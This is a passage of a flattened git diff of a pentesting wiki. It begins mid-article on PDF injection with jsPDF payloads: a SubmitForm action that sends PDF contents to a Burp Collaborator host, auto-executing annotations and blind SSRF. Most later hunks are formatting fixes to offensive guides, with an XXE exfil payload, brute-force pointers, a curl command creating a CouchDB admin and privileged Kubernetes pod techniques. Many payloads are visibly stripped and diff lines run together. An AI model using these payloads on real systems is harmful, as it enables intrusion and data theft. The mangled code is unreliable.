the contents of the PDF to be sent when submitting the form. All we need to do is use the base injection we created earlier and modify it to call the SubmitForm action instead of JavaScript:`/blah)>>/A<>/>>(` +`https://your-id.burpcollaborator.net)`\ +`/Type/Action>>/>>(` ### sPDF Next I applied my methodology to another PDF library - [jsPDF](https://parall.ax/products/jspdf) - and found it was vulnerable too. Exploiting this library was quite fun because they have an API that can execute in the browser and will allow you to generate the PDF in real time as you type. I noticed that, like the PDP-Lib library, they forgot to escape parentheses inside annotation URLs. Here the url property was vulnerable:`doc.createAnnotation({bounds:`\ - `{x:0,y:10,w:200,h:200},`\ - ``type:'link',url:`/input`});``\ - `//vulnerable` +`{x:0,y:10,w:200,h:200},`\ +``type:'link',url:`/input`});``\ +`//vulnerable` So I generated a PDF using their API and injected PDF code into the url property: `var doc = new jsPDF();`\ - `doc.text(20, 20, 'Hello world!');`\ - `doc.addPage('a6','l');`\ - `doc.createAnnotation({bounds:`\ - `` {x:0,y:10,w:200,h:200},type:'link',url:` ``\ - `/blah)>>/A<>/A<>/A<> >>`\ - `<> >>`\ - ``<>/(`});``\ - `doc.text(20, 20, 'Auto execute');` +``doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/)``\ +`>> >>`\ +``<>/(`});``\ +`doc.text(20, 20, 'Auto execute');` When you close the PDF, this annotation will fire:`var doc = new jsPDF();`\ - ``doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/) >> >>``\ - ``<>/(`});``\ - `doc.text(20, 20, 'Close me');` +``doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/) >> >>``\ +``<>/(`});``\ +`doc.text(20, 20, 'Close me');` ### Chrome I've talked a lot about Acrobat but what about PDFium (Chrome's PDF reader)? Chrome is tricky; the attack surface is much smaller as its JavaScript support is more limited than Acrobat's. The first thing I noticed was that JavaScript wasn't being executed in annotations at all, so my proof of concepts weren't working. In order to get the vectors working in Chrome, I needed to at least execute JavaScript inside annotations. First though, I decided to try and overwrite a URL in an annotation. This was pretty easy. I could use the base injection I came up with before and simply inject another action with a URI entry that would overwrite the existing URL:`var doc = new jsPDF();`\ - ``doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/blah)>>/A<>/F 0>>(`});``\ - `doc.text(20, 20, 'Test text');` +``doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/blah)>>/A<>/F 0>>(`});``\ +`doc.text(20, 20, 'Test text');` This would navigate to portswigger.net when clicked. Then I moved on and tried different injections to call JavaScript, but this would fail every time. I thought it was impossible to do. I took a step back and tried to manually construct an entire PDF that would call JavaScript from a click in Chrome without an injection. When using an AcroForm button, Chrome would allow JavaScript execution, but the problem was it required references to parts of the PDF. I managed to craft an injection that would execute JavaScript from a click on JSPDF:`var doc = new jsPDF();`\ - ``doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/) >> >> <>/Type/Annot/MK<>/Rect [ 72 697.8898 144 676.2897]/Subtype/Widget/AP<>>>/Parent <>/H/P/A<> >> <>/Type/Annot/MK<>/Rect [ 72 697.8898 144 676.2897]/Subtype/Widget/AP<>>>/Parent <>/H/P/A<> >> <>/Type/Annot/MK<>/Rect [ 72 697.8898 144 676.2897]/Subtype/Widget/AP<>>>/Parent <>/H/P/A<> >> <>/Type/Annot/MK<>/Rect [ 0 0 889 792]/Subtype/Widget/AP<>>>/Parent <>/H/P/A<>>><>/A<>>><>/A<> <>/A<> <>/A<> <>/A<> <>/A<> >>``\ - ``<> /Rect [0 0 900 900] /AA <>/(`});``\ - `doc.text(20, 20, 'Test');`\ +``doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/) >> >>``\ +``<> /Rect [0 0 900 900] /AA <>/(`});``\ +`doc.text(20, 20, 'Test');`\ `` ### SSRF in PDFium/Acrobat It's possible to send a POST request with PDFium/Acrobat to perform a SSRF attack. This would be a [blind SSRF](https://portswigger.net/web-security/ssrf/blind) since you can make a POST request but can't read the response. To construct a POST request, you can use the /parent dictionary key as demonstrated earlier to assign a form element to the annotation, enabling JavaScript execution. But instead of using a button like we did before, you can assign a text field (/Tx) with the parameter name (/T) and parameter value (/V) dictionary keys. Notice how you have to pass the parameter names you want to use to the submitForm function as an array:`#)>>>><>/A<> >> <>/A<> >> <>/A<) -_**Please notice that external DTD allows us to include one entity inside the second (****`eval`****), but it is prohibited in the internal DTD. Therefore, you can't force an error without using an external DTD (usually).**_ +_**Please notice that external DTD allows us to include one entity inside the second (`eval`), but it is prohibited in the internal DTD. Therefore, you can't force an error without using an external DTD (usually).**_ ### **Error Based (system DTD)** @@ -547,7 +547,7 @@ You can create an **entity inside an entity** encoding it with **html entities** Note that the **HTML Entities** used needs to be **numeric** (like \[in this example]\([https://gchq.github.io/CyberChef/#recipe=To\_HTML\_Entity%28true,'Numeric entities'%29\&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)\\](https://gchq.github.io/CyberChef/#recipe=To\_HTML\_Entity%28true,%27Numeric%20entities%27%29\&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B\)%5C)). ```markup -%a;%dtd;]> +%a;%dtd;]> &exfil; diff --git a/pentesting/1521-1522-1529-pentesting-oracle-listener/README.md b/pentesting/1521-1522-1529-pentesting-oracle-listener/README.md index e5dee3ca..a818321e 100644 --- a/pentesting/1521-1522-1529-pentesting-oracle-listener/README.md +++ b/pentesting/1521-1522-1529-pentesting-oracle-listener/README.md @@ -103,7 +103,7 @@ pip3 install cx_Oracle --upgrade **Got SID?** Excellent, now let’s move to the next task and extract the user account information. From this point, you can connect to the listener and brute-force credentials. -**Metasploit** _\*\*scanner/oracle/oracle\_login_ It has a built-in dictionary for the **most popular default values of user account** information presented as login:password. By the way, such default entries represent one of the most popular and serious security problems in Oracle. +**Metasploit** _**scanner/oracle/oracle\_login_ It has a built-in dictionary for the **most popular default values of user account** information presented as login:password. By the way, such default entries represent one of the most popular and serious security problems in Oracle. **Nmap** can also help here with the script _oracle-brute_. Note that this script **mixes the logins and passwords**, that is, it tries each login against every password, and it takes quite a while! @@ -188,7 +188,7 @@ If ODAT **founds at least one SID** \(e.g. _ORCL_\), it will **search valid Orac For **each valid account** \(e.g. _SYS_\) **on each valid instance** \(SID\), ODAT will return **what each Oracle user can do** \(e.g. reverse shell, read files, become DBA\). -[**Wiki odat**](https://github.com/quentinhardy/odat/wiki)\*\*\*\* +[**Wiki odat**](https://github.com/quentinhardy/odat/wiki) ## Remote Code Execution diff --git a/pentesting/15672-pentesting-rabbitmq-management.md b/pentesting/15672-pentesting-rabbitmq-management.md index 83410f0d..59405ad4 100644 --- a/pentesting/15672-pentesting-rabbitmq-management.md +++ b/pentesting/15672-pentesting-rabbitmq-management.md @@ -12,7 +12,7 @@ The main page should looks like this: The default credentials are "_**guest**_":"_**guest**_". If they aren't working you may try to [**brute-force the login**](../brute-force.md#http-post-form). -To manually start this module you need to execute: +To manually start this module you need to execute: ``` rabbitmq-plugins enable rabbitmq_management diff --git a/pentesting/1883-pentesting-mqtt-mosquitto.md b/pentesting/1883-pentesting-mqtt-mosquitto.md index 00b222ee..de11bcfe 100644 --- a/pentesting/1883-pentesting-mqtt-mosquitto.md +++ b/pentesting/1883-pentesting-mqtt-mosquitto.md @@ -17,7 +17,7 @@ MQTT brokers send a **CONNACK** packet in **response** to a CONNECT packet. The ![](<../.gitbook/assets/image (645) (1).png>) -### ****[**Brute-Force MQTT**](../brute-force.md#mqtt)**** +### [**Brute-Force MQTT**](../brute-force.md#mqtt) ## Pentesting MQTT @@ -31,7 +31,7 @@ To connect to a MQTT service you can use: [https://github.com/bapowell/python-mq > subscribe "$SYS/#" ``` -You could also use [**https://github.com/akamai-threat-research/mqtt-pwn**](https://github.com/akamai-threat-research/mqtt-pwn)**** +You could also use [**https://github.com/akamai-threat-research/mqtt-pwn**](https://github.com/akamai-threat-research/mqtt-pwn) You can also use: diff --git a/pentesting/2375-pentesting-docker.md b/pentesting/2375-pentesting-docker.md index 9df93bc4..a9940bc7 100644 --- a/pentesting/2375-pentesting-docker.md +++ b/pentesting/2375-pentesting-docker.md @@ -67,7 +67,7 @@ ctr container delete ### Podman -**Info** [**from here**](https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html#:\~:text=What%20is%20Podman%3F,and%20support%20for%20rootless%20containers.)**** +**Info** [**from here**](https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html#:\~:text=What%20is%20Podman%3F,and%20support%20for%20rootless%20containers.) Podman is an open source, OCI ([Open Container Initiative](https://github.com/opencontainers)) compliant container engine. It is driven by Red Hat and incorporates a few major differences from Docker, such as its daemonless architecture and support for rootless containers. At their core, **both tools do the same thing: manage images and containers**. One of **Podman’s objectives is to have a Docker-compatible API**. Hence almost all CLI (command line interface) commands from the Docker CLI are also available in Podman. @@ -247,7 +247,7 @@ docker cp :/etc/ ### Securing Docker installation and usage * You can use the tool [https://github.com/docker/docker-bench-security](https://github.com/docker/docker-bench-security) to inspect your current docker installation. - * `./docker-bench-security.sh` + * `./docker-bench-security.sh` * You can use the tool [https://github.com/kost/dockscan](https://github.com/kost/dockscan) to inspect your current docker installation. * `dockscan -v unix:///var/run/docker.sock` * You can use the tool [https://github.com/genuinetools/amicontained](https://github.com/genuinetools/amicontained) the privileges a container will have when run with different security options. This is useful to know the implications of using some security options to run a container: diff --git a/pentesting/24007-24008-24009-49152-pentesting-glusterfs.md b/pentesting/24007-24008-24009-49152-pentesting-glusterfs.md index 7ba6a4b5..aaf1a428 100644 --- a/pentesting/24007-24008-24009-49152-pentesting-glusterfs.md +++ b/pentesting/24007-24008-24009-49152-pentesting-glusterfs.md @@ -15,7 +15,7 @@ PORT STATE SERVICE ### Enumeration -To interact with this filesystem you need to install the [**GlusterFS client**](https://download.gluster.org/pub/gluster/glusterfs/LATEST/) **** (`sudo apt-get install glusterfs-cli`). +To interact with this filesystem you need to install the [**GlusterFS client**](https://download.gluster.org/pub/gluster/glusterfs/LATEST/) (`sudo apt-get install glusterfs-cli`). To list and mount the available volumes you can use: diff --git a/pentesting/27017-27018-mongodb.md b/pentesting/27017-27018-mongodb.md index 67f6c9b8..eac359f7 100644 --- a/pentesting/27017-27018-mongodb.md +++ b/pentesting/27017-27018-mongodb.md @@ -70,7 +70,7 @@ The nmap script: _**mongodb-brute**_ will check if creds are needed. nmap -n -sV --script mongodb-brute -p 27017 ``` -### [**Brute force**](../brute-force.md#mongo)**** +### [**Brute force**](../brute-force.md#mongo) Look inside _/opt/bitnami/mongodb/mongodb.conf_ to know if credentials are needed: diff --git a/pentesting/3260-pentesting-iscsi.md b/pentesting/3260-pentesting-iscsi.md index 452e5afa..c85d44b1 100644 --- a/pentesting/3260-pentesting-iscsi.md +++ b/pentesting/3260-pentesting-iscsi.md @@ -161,7 +161,7 @@ node.conn[0].iscsi.OFMarker = No # END RECORD ``` -**There is a script to automate basic subnet enumeration process available at** [**iscsiadm**](https://github.com/bitvijays/Pentest-Scripts/tree/master/Vulnerability_Analysis/isciadm)\*\*\*\* +**There is a script to automate basic subnet enumeration process available at** [**iscsiadm**](https://github.com/bitvijays/Pentest-Scripts/tree/master/Vulnerability_Analysis/isciadm) ## **Shodan** diff --git a/pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md b/pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md index 87b36dbb..9af918a0 100644 --- a/pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md +++ b/pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md @@ -1,6 +1,6 @@ # 50030,50060,50070,50075,50090 - Pentesting Hadoop -**Information taken from the book** [**Network Security Assesment 3rd Edition**](https://www.amazon.com/Network-Security-Assessment-Know-Your-ebook/dp/B01N6E0BG2)**** +**Information taken from the book** [**Network Security Assesment 3rd Edition**](https://www.amazon.com/Network-Security-Assessment-Know-Your-ebook/dp/B01N6E0BG2) ## **Basic Information** diff --git a/pentesting/512-pentesting-rexec.md b/pentesting/512-pentesting-rexec.md index 7eb21222..a1f63abd 100644 --- a/pentesting/512-pentesting-rexec.md +++ b/pentesting/512-pentesting-rexec.md @@ -11,4 +11,4 @@ PORT STATE SERVICE 512/tcp open exec ``` -### ****[**Brute-force**](../brute-force.md#rexec)**** +### [**Brute-force**](../brute-force.md#rexec) diff --git a/pentesting/515-pentesting-line-printer-daemon-lpd.md b/pentesting/515-pentesting-line-printer-daemon-lpd.md index 154696f2..d60897fd 100644 --- a/pentesting/515-pentesting-line-printer-daemon-lpd.md +++ b/pentesting/515-pentesting-line-printer-daemon-lpd.md @@ -1,7 +1,7 @@ # 515 - Pentesting Line Printer Daemon (LPD) The Line Printer Daemon (LPD) protocol had originally been introduced in Berkeley Unix in the 80s (later specified by RFC1179).\ -The daemon runs on port 515/tcp and can be accessed using the `lpr`command. To print, the client sends a **control file** defining job/username and a **data file** containing the actual data to be printed. The **input type** of the data file can be set in the control file by choosing among **various file formats**. However it is up to the LPD implementation how to actually handle the print data. A popular LPD implementation for Unix-like operating system is LPRng. LPD can be used as a carrier to deploy **malicious PostScript** or **PJL print jobs**. +The daemon runs on port 515/tcp and can be accessed using the `lpr`command. To print, the client sends a **control file** defining job/username and a **data file** containing the actual data to be printed. The **input type** of the data file can be set in the control file by choosing among **various file formats**. However it is up to the LPD implementation how to actually handle the print data. A popular LPD implementation for Unix-like operating system is LPRng. LPD can be used as a carrier to deploy **malicious PostScript** or **PJL print jobs**. The `lpdprint` and `lpdtest` tools are included in [**PRET**](https://github.com/RUB-NDS/PRET)**.** They are a minimalist way to print data directly to an LPD capable printer or download/upload/delete files and more: diff --git a/pentesting/554-8554-pentesting-rtsp.md b/pentesting/554-8554-pentesting-rtsp.md index 36b000d0..e129c418 100644 --- a/pentesting/554-8554-pentesting-rtsp.md +++ b/pentesting/554-8554-pentesting-rtsp.md @@ -55,7 +55,7 @@ print(data) Voila! You have access. -**From:** [**http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/**](https://web.archive.org/web/20161020202643/http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/)**** +**From:** [**http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/**](https://web.archive.org/web/20161020202643/http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/) ## Enumeration diff --git a/pentesting/584-pentesting-afp.md b/pentesting/584-pentesting-afp.md index 6ffbde21..3ff6ec4c 100644 --- a/pentesting/584-pentesting-afp.md +++ b/pentesting/584-pentesting-afp.md @@ -25,4 +25,4 @@ nmap -sV --script "afp-* and not dos and not brute" -p | afp-serverinfo | Displays AFP server information | | afp-showmount | Lists available AFP shares and respective ACLs | -### [**Brute Force**](../brute-force.md#afp)**** +### [**Brute Force**](../brute-force.md#afp) diff --git a/pentesting/5984-pentesting-couchdb.md b/pentesting/5984-pentesting-couchdb.md index e37be7c8..bf097f4f 100644 --- a/pentesting/5984-pentesting-couchdb.md +++ b/pentesting/5984-pentesting-couchdb.md @@ -131,7 +131,7 @@ Thanks to the differences between Erlang and JavaScript JSON parsers you could * curl -X PUT -d '{"type":"user","name":"hacktricks","roles":["_admin"],"roles":[],"password":"hacktricks"}' localhost:5984/_users/org.couchdb.user:hacktricks -H "Content-Type:application/json" ``` -\*\*\*\*[**More information about this vuln here**](https://justi.cz/security/2017/11/14/couchdb-rce-npm.html). +[**More information about this vuln here**](https://justi.cz/security/2017/11/14/couchdb-rce-npm.html). ## CouchDB RCE diff --git a/pentesting/5985-5986-pentesting-omi.md b/pentesting/5985-5986-pentesting-omi.md index 552547dc..e26acaab 100644 --- a/pentesting/5985-5986-pentesting-omi.md +++ b/pentesting/5985-5986-pentesting-omi.md @@ -17,7 +17,7 @@ When these services are configured, the omiengine process will listen on all int **Default port:** 5985(http), 5986(https) -## [CVE-2021-38647](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647) +## [CVE-2021-38647](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647) As of September 16, newly created Linux servers in Azure are still packaged with a vulnerable version of the OMI agent. After deploying a Linux server and enabling one the services listed above, the server will be in a vulnerable state. diff --git a/pentesting/5985-5986-pentesting-winrm.md b/pentesting/5985-5986-pentesting-winrm.md index 162105c9..5b1061c7 100644 --- a/pentesting/5985-5986-pentesting-winrm.md +++ b/pentesting/5985-5986-pentesting-winrm.md @@ -26,7 +26,7 @@ Set-Item wsman:\localhost\client\trustedhosts * This adds a wildcard to the trustedhosts setting. Be wary of what that entails. _Note: I also had to change the network type on my attack machine from "Public" to "Work" network._ -You can also **activate** WinRM **remotely** _\*\*\_using \_wmic_: +You can also **activate** WinRM **remotely** _**\_using \_wmic_: ``` wmic /node: process call create "powershell enable-psremoting -force" diff --git a/pentesting/623-udp-ipmi.md b/pentesting/623-udp-ipmi.md index 128023ec..149cb61a 100644 --- a/pentesting/623-udp-ipmi.md +++ b/pentesting/623-udp-ipmi.md @@ -1,6 +1,6 @@ # 623/UDP/TCP - IPMI -**Information taken from** [**https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/**](https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/)**** +**Information taken from** [**https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/**](https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/) ## Basic Information @@ -72,7 +72,7 @@ root@kali:~# ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set pass ### Vulnerability - IPMI Anonymous Authentication - In addition to the authentication problems above, Dan Farmer noted that **many BMCs ship with "anonymous" access enabled by default**. This is configured by setting the username of the first **user** account to a **null string** and **setting** a **null password** to match. The _ipmi\_dumphashes_ module will identify and dump the password hashes (including blank passwords) for null user accounts. **This account can be difficult to use on its own, but we can leverage `ipmitool` to reset the password of a named user account** and leverage that account for access to other services: +In addition to the authentication problems above, Dan Farmer noted that **many BMCs ship with "anonymous" access enabled by default**. This is configured by setting the username of the first **user** account to a **null string** and **setting** a **null password** to match. The _ipmi\_dumphashes_ module will identify and dump the password hashes (including blank passwords) for null user accounts. **This account can be difficult to use on its own, but we can leverage `ipmitool` to reset the password of a named user account** and leverage that account for access to other services: ```bash ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user list diff --git a/pentesting/6379-pentesting-redis.md b/pentesting/6379-pentesting-redis.md index a0e0cc31..838be4d1 100644 --- a/pentesting/6379-pentesting-redis.md +++ b/pentesting/6379-pentesting-redis.md @@ -52,8 +52,8 @@ If only password is configured the username used is "**default**".\ Also, note that there is **no way to find externally** if Redis was configured with only password or username+password. {% endhint %} -In cases like this one you will **need to find valid credentials** to interact with Redis so you could try to [**brute-force**](../brute-force.md#redis) **\*\*it.**\ -**In case you found valid credentials you need to** authenticate the session\*\* after establishing the connection with the command: +In cases like this one you will **need to find valid credentials** to interact with Redis so you could try to [**brute-force**](../brute-force.md#redis) it.**\ +**In case you found valid credentials you need to** authenticate the session** after establishing the connection with the command: ```bash AUTH @@ -117,7 +117,7 @@ HGET [ ... Get hash item ... ] ``` -**Dump the database with npm**[ **redis-dump**](https://www.npmjs.com/package/redis-dump) **or python** [**redis-utils**](https://pypi.org/project/redis-utils/)\*\*\*\* +**Dump the database with npm**[ **redis-dump**](https://www.npmjs.com/package/redis-dump) **or python** [**redis-utils**](https://pypi.org/project/redis-utils/) ## Redis RCE diff --git a/pentesting/8009-pentesting-apache-jserv-protocol-ajp.md b/pentesting/8009-pentesting-apache-jserv-protocol-ajp.md index 5570f7bf..c6b4713f 100644 --- a/pentesting/8009-pentesting-apache-jserv-protocol-ajp.md +++ b/pentesting/8009-pentesting-apache-jserv-protocol-ajp.md @@ -71,5 +71,5 @@ Module options (exploit/multi/http/tomcat_mgr_deploy): nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -n -p 8009 ``` -### \*\*\*\*[**Brute force**](../brute-force.md#ajp)\*\*\*\* +### [**Brute force**](../brute-force.md#ajp) diff --git a/pentesting/873-pentesting-rsync.md b/pentesting/873-pentesting-rsync.md index e5e248eb..1e4a6df7 100644 --- a/pentesting/873-pentesting-rsync.md +++ b/pentesting/873-pentesting-rsync.md @@ -54,7 +54,7 @@ rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730 Notice that it could be configured a shared name to not be listed. So there could be something **hidden**.\ Notice that it may be some **shared names** being listed where you need some (different) **credentials** to access. So, not always all the listed names are going to be accessible and you will notice it if you receive an _**"Access Denied"**_ message when trying to access some of those. -### ****[**Brute force**](../brute-force.md#rsync) +### [**Brute force**](../brute-force.md#rsync) ### Manual Rsync diff --git a/pentesting/9200-pentesting-elasticsearch.md b/pentesting/9200-pentesting-elasticsearch.md index 2f37e81e..0bf49e11 100644 --- a/pentesting/9200-pentesting-elasticsearch.md +++ b/pentesting/9200-pentesting-elasticsearch.md @@ -97,7 +97,7 @@ Here are some endpoints that you can **access via GET** to **obtain** some **inf These endpoints were [**taken from the documentation**](https://www.elastic.co/guide/en/elasticsearch/reference/current/rest-apis.html) where you can **find more**.\ Also, if you access `/_cat` the response will contain the `/_cat/*` endpoints supported by the instance. -In `/_security/user` (if auth enabled) you can see which user has role `superuser`. +In `/_security/user` (if auth enabled) you can see which user has role `superuser`. ### Indices diff --git a/pentesting/cassandra.md b/pentesting/cassandra.md index bf1ca4ce..d35ca094 100644 --- a/pentesting/cassandra.md +++ b/pentesting/cassandra.md @@ -40,9 +40,9 @@ There aren't much options here and nmap doesn't obtain much info nmap -sV --script cassandra-info -p ``` -### ****[**Brute force**](../brute-force.md#cassandra)**** +### [**Brute force**](../brute-force.md#cassandra) ### **Shodan** `port:9160 Cluster`\ -****`port:9042 "Invalid or unsupported protocol version"` +`port:9042 "Invalid or unsupported protocol version"` diff --git a/pentesting/pentesting-ftp/README.md b/pentesting/pentesting-ftp/README.md index 47db5811..db388aa3 100644 --- a/pentesting/pentesting-ftp/README.md +++ b/pentesting/pentesting-ftp/README.md @@ -151,7 +151,7 @@ wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 #Download all Some FTP servers allow the command PORT. This command can be used to indicate to the server that you wants to connect to other FTP server at some port. Then, you can use this to scan which ports of a host are open through a FTP server. -[**Learn here how to abuse a FTP server to scan ports.**](ftp-bounce-attack.md)\*\*\*\* +[**Learn here how to abuse a FTP server to scan ports.**](ftp-bounce-attack.md) You could also abuse this behaviour to make a FTP server interact with other protocols. You could **upload a file containing an HTTP request** and make the vulnerable FTP server **send it to an arbitrary HTTP server** (_maybe to add a new admin user?_) or even upload a FTP request and make the vulnerable FTP server download a file for a different FTP server.\ The theory is easy: diff --git a/pentesting/pentesting-jdwp-java-debug-wire-protocol.md b/pentesting/pentesting-jdwp-java-debug-wire-protocol.md index d94ae2b6..700939ba 100644 --- a/pentesting/pentesting-jdwp-java-debug-wire-protocol.md +++ b/pentesting/pentesting-jdwp-java-debug-wire-protocol.md @@ -15,7 +15,7 @@ I found that the use of `--break-on 'java.lang.String.indexOf'` make the exploit Normally this debugger is run on port 8000 and if you establish a TCP connection with the port and send "**JDWP-Handshake**", the server should respond you with the same string.\ Also, you can check this string in the network to find possible JDWP services. -Listing **processes**, if you find the string "**jdwk**" inside a **java process**, probably it has active the \*\*Java Debug Wired Protocol \*\*and you may be able to move laterally or even **escalate privileges** (if executed as root). +Listing **processes**, if you find the string "**jdwk**" inside a **java process**, probably it has active the **Java Debug Wired Protocol **and you may be able to move laterally or even **escalate privileges** (if executed as root). ## More details @@ -66,7 +66,7 @@ An experienced security auditor may have already realised that such a simple han The Length and Id fields are rather self explanatory. The Flag field is only used to distinguish request packets from replies, a value of 0x80 indicating a reply packet. The CommandSet field defines the category of the Command as shown in the following table.\ \\ -| **CommandSet** | \*\* Command\*\* | +| **CommandSet** | ** Command** | | -------------- | ---------------------------------------------------------------------------------------------------------------- | | 0x40 | Action to be taken by the JVM (e.g. setting a BreakPoint) | | 0x40–0x7F | Provide event information to the debugger (e.g. the JVM has hit a BreakPoint and is waiting for further actions) | @@ -190,7 +190,7 @@ These are just a few ways to discover open JDWP services on the Internet. This i **Thanks**\ \ -\*\*\*\*I would like to thank Ilja Van Sprundel and Sebastien Macke for their ideas and tests. +I would like to thank Ilja Van Sprundel and Sebastien Macke for their ideas and tests. ### **References:** diff --git a/pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md b/pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md index bce69e9d..37cfb2f1 100644 --- a/pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md +++ b/pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md @@ -24,4 +24,4 @@ Based on the **heracles.sh script** (from the paper) a C tool you can use (creat /tmp/tickey -i ``` -**This information was taken from:** [**https://www.tarlogic.com/en/blog/how-to-attack-kerberos/**](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)**** +**This information was taken from:** [**https://www.tarlogic.com/en/blog/how-to-attack-kerberos/**](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/) diff --git a/pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md b/pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md index b8665aa8..5a3a5073 100644 --- a/pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md +++ b/pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md @@ -88,7 +88,7 @@ In case the **compromised pod is running some sensitive service** where other po ## Network Spoofing By default techniques like **ARP spoofing** (and thanks to that **DNS Spoofing**) work in kubernetes network. Then, inside a pod, if you have the **NET\_RAW capability** (which is there by default), you will be able to send custom crafted network packets and perform **MitM attacks via ARP Spoofing to all the pods running in the same node.**\ -****Moreover, if the **malicious pod** is running in the **same node as the DNS Server**, you will be able to perform a **DNS Spoofing attack to all the pods in cluster**. +Moreover, if the **malicious pod** is running in the **same node as the DNS Server**, you will be able to perform a **DNS Spoofing attack to all the pods in cluster**. {% content-ref url="../../cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md" %} [kubernetes-network-attacks.md](../../cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md) @@ -121,7 +121,7 @@ If you managed to **escape from the container** there are some interesting thing * The whole **filesystem** and **OS** in general * The **Kube-Proxy** service listening * The **Kubelet** service listening. Check config files: - * Directory: `/var/lib/kubelet/` + * Directory: `/var/lib/kubelet/` * `/var/lib/kubelet/kubeconfig` * `/var/lib/kubelet/kubelet.conf` * `/var/lib/kubelet/config.yaml` @@ -135,7 +135,7 @@ If you managed to **escape from the container** there are some interesting thing ### Find node kubeconfig -If you cannot find the kubeconfig file in one of the previously commented paths, **check the argument `--kubeconfig` of the kubelet process**: +If you cannot find the kubeconfig file in one of the previously commented paths, **check the argument `--kubeconfig` of the kubelet process**: ``` ps -ef | grep kubelet @@ -243,7 +243,7 @@ In order to create a static pod you may just need to **save the yaml configurati The **path to the folder** where you should write the pods is given by the parameter **`--pod-manifest-path` of the kubelet process**. If it isn't set you might need to set it and restart the process to abuse this technique. -**Example** of **pod** configuration to create a privilege pod in **kube-system** taken from **** [**here**](https://research.nccgroup.com/2020/02/12/command-and-kubectl-talk-follow-up/): +**Example** of **pod** configuration to create a privilege pod in **kube-system** taken from [**here**](https://research.nccgroup.com/2020/02/12/command-and-kubectl-talk-follow-up/): ```yaml apiVersion: v1 @@ -273,7 +273,7 @@ spec: ## Automatic Tools -* [**https://github.com/inguardians/peirates**](https://github.com/inguardians/peirates)**** +* [**https://github.com/inguardians/peirates**](https://github.com/inguardians/peirates) ``` Peirates v1.1.8-beta by InGuardians diff --git a/pentesting/pentesting-kubernetes/kubernetes-basics.md b/pentesting/pentesting-kubernetes/kubernetes-basics.md index 09a084d8..2223db59 100644 --- a/pentesting/pentesting-kubernetes/kubernetes-basics.md +++ b/pentesting/pentesting-kubernetes/kubernetes-basics.md @@ -18,7 +18,7 @@ ![](https://sickrov.github.io/media/Screenshot-68.jpg) * **Node**: operating system with pod or pods. - * **Pod**: Wrapper around a container or multiple containers with. A pod should only contain one application (so usually, a pod run just 1 container). The pod is the way kubernetes abstracts the container technology running. + * **Pod**: Wrapper around a container or multiple containers with. A pod should only contain one application (so usually, a pod run just 1 container). The pod is the way kubernetes abstracts the container technology running. * **Service**: Each pod has 1 internal **IP address** from the internal range of the node. However, it can be also exposed via a service. The **service has also an IP address** and its goal is to maintain the communication between pods so if one dies the **new replacement** (with a different internal IP) **will be accessible** exposed in the **same IP of the service**. It can be configured as internal or external. The service also actuates as a **load balancer when 2 pods are connected** to the same service. \ When a **service** is **created** you can find the endpoints of each service running `kubectl get endpoints` @@ -31,7 +31,7 @@ * **Api Server:** Is the way the users and the pods use to communicate with the master process. Only authenticated request should be allowed. * **Scheduler**: Scheduling refers to making sure that Pods are matched to Nodes so that Kubelet can run them. It has enough intelligence to decide which node has more available resources the assign the new pod to it. Note that the scheduler doesn't start new pods, it just communicate with the Kubelet process running inside the node, which will launch the new pod. * **Kube Controller manager**: It checks resources like replica sets or deployments to check if, for example, the correct number of pods or nodes are running. In case a pod is missing, it will communicate with the scheduler to start a new one. It controls replication, tokens, and account services to the API. - * **etcd**: Data storage, persistent, consistent, and distributed. Is Kubernetes’s database and the key-value storage where it keeps the complete state of the clusters (each change is logged here). Components like the Scheduler or the Controller manager depends on this date to know which changes have occurred (available resourced of the nodes, number of pods running...) + * **etcd**: Data storage, persistent, consistent, and distributed. Is Kubernetes’s database and the key-value storage where it keeps the complete state of the clusters (each change is logged here). Components like the Scheduler or the 